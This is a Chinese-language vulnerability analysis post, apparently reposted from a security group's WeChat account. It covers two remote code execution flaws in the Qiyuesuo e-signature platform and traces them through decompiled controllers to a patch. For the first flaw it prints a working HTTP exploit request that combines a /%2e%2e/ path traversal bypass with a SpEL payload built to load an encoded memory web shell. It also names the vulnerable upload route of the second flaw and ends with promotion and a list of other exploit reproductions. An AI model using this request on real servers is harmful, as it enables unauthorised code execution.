[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

渗透技巧 9个月前 admin
433 0 0


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x00免责声明


免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

马赛克安全实验室情报申明(可点击查看)


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x01漏洞一概述


       契约锁漏洞,攻击者可构造恶意请求获取系统信息等及其它安全风险。目前网上流传一些关于契约锁漏洞,现也抽出一些时间对契约锁漏洞进行漏洞分析。

1.契约锁电子签章平台远程代码执行漏洞

POST /captcha/%2e%2e/template/html/add HTTP/1.1Host: xxxAccept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; WindowsNT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/json
{"file":"abc","title":"abc","params":[{"extensionParam":"{"expression":"vara=new org.springframework.expression.spel.standard.SpelExpressionParser();varb='base64 编码后的内存马 ';varb64=java.util.Base64.getDecoder();var deStr=newjava.lang.String(b64.decode(b),'UTF-8');varc=a['parseExpression'](deStr);c.getValue();"}","name":"test"}]}

        我们根据漏洞poc来看,很明显是使用了../进行了跨目录进行权限绕过,经查阅资料使用/%2e%2e/绕过权限限制,简要说明是由于Spring框架使用了alwaysUseFullPath为默认值false,这会使得其获取ServletPath(后台路径),所以在路由匹配时相当于会进行路径标准化包括对%2e解码以及处理跨目录,从而绕过拦截器对../的限制。

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

参考:https://mp.weixin.qq.com/s/EQSbhpypUVOyyvxbWVVc1g

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x02受影响URL





                受影响URL:

              /captcha/%2e%2e/template/html/add


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x03漏洞详情





        

       漏洞类型:远程命令执行漏洞
        影响:系统可用性和安全性威胁

       简述:契*锁漏洞攻击者可构造恶意请求获取系统信息,造成数据系统及其它安全风险。

调试分析

接下来我们可定位真实路由:/template/html/add,全局搜索“template”关键字查找Controller,可定位

com.qiyuesuo.api.TemplateHtmlController

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

往下跟进发现/html/add 路由,发现 addHtmlTemplate()方法

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

发现该方法所需的参数与poc中的参数类似,进一步确定该漏洞存在该方法中,构造TemplateBean,根据代码看出TemplateBean,file(127行),title(128行),params(162行),extensionParam(170行),name(183行)

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

继续跟进到checkExpression()方法,发现存在代码执行函数eval,流程结束.

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

延展一下,如果我们从黑盒角度分析,刚拿到这个代码我们如何去分析到这个代码执行的点呢?
使用jadx-gui,全局搜索eval关键字,然后定位到Controller

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

发现checkExpression()方法调用了eval可导致代码执行

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

我们再去查找是谁调用了checkExpression()方法

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

然后逐个跟进,最后确定/html/add 路由下调用了该方法

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试



[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x04漏洞二概述


1.契约锁upload代码执行漏洞

POST /login/%2e%2e/utask/upload HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_10_2) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/49.0.818.0 Safari/531.2Content-Type: multipart/form-data;
***
[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x05受影响URL






                受影响URL:

              /login/%2e%2e/utask/upload


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x06漏洞详情





        

       漏洞类型:upload代码执行漏洞
        影响:系统可用性和安全性威胁

       简述:契*锁upload代码执行漏洞攻击者可构造恶意请求获取系统信息,造成数据系统及其它安全风险。

调试分析

同样根据路径确定Controller

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

跟进upload,发现该方法主要实现上传自定义代码,在未出补丁之前这块存在任意文件上传漏洞,不过应该是全修复了

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

跟进this.userTaskService.uploadFile(sourceCode);

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

跟进this.customCodeStrategyManager.compileCustomCode,即使传txt,只要符合java代码格式即可编译成java代码造成命令执行漏洞。

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试



[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x07补丁分析


补丁分析

官方安全补丁地址
https://www.qiyuesuo.com/more/security/servicepack

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试


适应版本:4.3.0 – 4.3.7
平台: Windows/Linux
更新时间:2023-10-11
MD5: cfe75dc6f239ff5fa00185956b0ecac6
最新补丁包版本信息: 1.1.0
将下载的补丁包中的private-security-patch.jar导入到idea中,security.rsc 加密的信息

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

这里不公开解密方法,解密方法在源码中可,很好找可自行解密。
解密完成后,可看到黑名单以及哪些路由有出现过漏洞,留给大家自己分析吧。

            专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖。

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

(星球内部分工具脚本截图)

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x08修复建议


                        建议用户升级到安全版本。


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x09星球精选主题






星球活跃度

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

 

精选主题一[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

精选主题二[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

精选主题三[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

精选主题四[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

精选主题五[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

        马赛克安全实验室星球期待您的加入,星球秉着高质量持续稳定的输出,星球成员活跃互帮互助,相互学习提升。




[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x010团队介绍








      

          马赛克安全实验室专注于:漏洞复现、渗透测试、nday、0day、网络安全、红蓝对抗,持续输出安全相关漏洞情报、漏洞复现相关漏洞验证脚本及工具。

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x11工具列表


工具列表(点击可直接查看)

[安全工具开发-1]MOSAIC HongJing Crypt Tools V1.0

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

0x12复现列表


复现列表(点击可直接查看)

[漏洞复现-1]亿X通电子文档SQL注入漏洞

[漏洞复现-2]FE飞X互联命令执行漏洞

[漏洞复现-4]X达OA-SQL注入漏洞

[漏洞复现-5]XXX研信息系统文件上传

[漏洞复现-6]FE飞X互联多X漏洞

[漏洞复现-7]泛XOA-sql注入漏洞

[漏洞复现-8]g**server命令执行漏洞

[漏洞复现-9]广*达敏感*息泄露漏洞

[漏洞复现-10]宏*任意文件读取漏洞

[漏洞复现-11]万*任意文件上传漏洞

[漏洞复现-12]***管理平台SQL注入漏洞

[漏洞复现-13]泛*OA任意文件上传漏洞

[漏洞复现-14]金**A*存在前台文件上传漏洞

[漏洞复现-15]**星文件下载漏洞

[漏洞复现-16]大*image-ssrf漏洞

[漏洞复现-17]万*OA-sql注入漏洞-在野

[漏洞复现-18]数**指*云平台SQL注入漏洞

[漏洞复现-19]泛*OA-sql注入漏洞

[漏洞复现-20]泛*OA-common-sql注入漏洞

[漏洞复现-21]蓝*OAE*S-saveImg-文件上传漏洞

[漏洞复现-22]用*OA-G*P文件上传漏洞

[漏洞复现-23]网**防*墙文件上传漏洞

[漏洞复现-24]万*OA axis组件远程命令执行漏洞

[漏洞复现-25]万*OA XXE漏洞

[漏洞复现-26]契**电子**平台远程命令执行漏洞

[漏洞复现-27]用*NC 文件读取漏洞

[漏洞复现-28]通*OA-handle逻辑漏洞

[漏洞复现-29]金*OA-EAS-文件上传漏洞

[漏洞复现-30]泛*OA-Eoffice信息泄露漏洞

[漏洞复现-31]泛*OA信息泄露组合漏洞

[漏洞复现-32]宏*OA-KhFieldTree注入漏洞

[漏洞复现-33]用*OA-U8-Cloud-XXE漏洞

[漏洞复现-34]Huawei Auth-Http文件泄露漏洞

[漏洞复现-35]用*OA-移动系统-文件读取漏洞

[漏洞复现-36]致*OA-文件读取漏洞

[漏洞复现-37]泛*OA-json-注入漏洞

[漏洞复现-38]用*OA-移动系统-file文件读取漏洞

[漏洞复现-39]用*OA-移动系统-initlo注入漏洞


[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试



原文始发于微信公众号(马赛克安全实验室):[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试

版权声明:admin 发表于 2023年10月25日 上午9:00。
转载请注明:[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...